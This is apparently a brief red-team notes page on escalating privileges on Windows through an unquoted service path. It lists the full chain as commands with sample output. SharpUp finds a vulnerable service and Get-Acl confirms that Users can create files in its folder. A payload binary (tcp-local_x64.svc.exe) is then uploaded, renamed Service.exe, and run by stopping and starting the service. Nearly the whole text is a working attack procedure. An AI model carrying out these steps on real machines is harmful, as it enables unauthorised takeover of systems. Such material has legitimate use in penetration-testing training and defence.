Unquoted Service Paths
Using SharpUp
Find vulnerable service
SharpUp.exe audit UnquotedServicePath
VulnService1 'C:\Program Files\Vulnerable Services\Service 1.exe'Check write priv in folder of binary
powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl
BUILTIN\Users Allow CreateFilesPlant binary
cd C:\Program Files\Vulnerable Services
upload C:\Payloads\tcp-local_x64.svc.exe
mv tcp-local_x64.svc.exe Service.exeRestart service
run sc stop VulnService1
run sc start VulnService1Last updated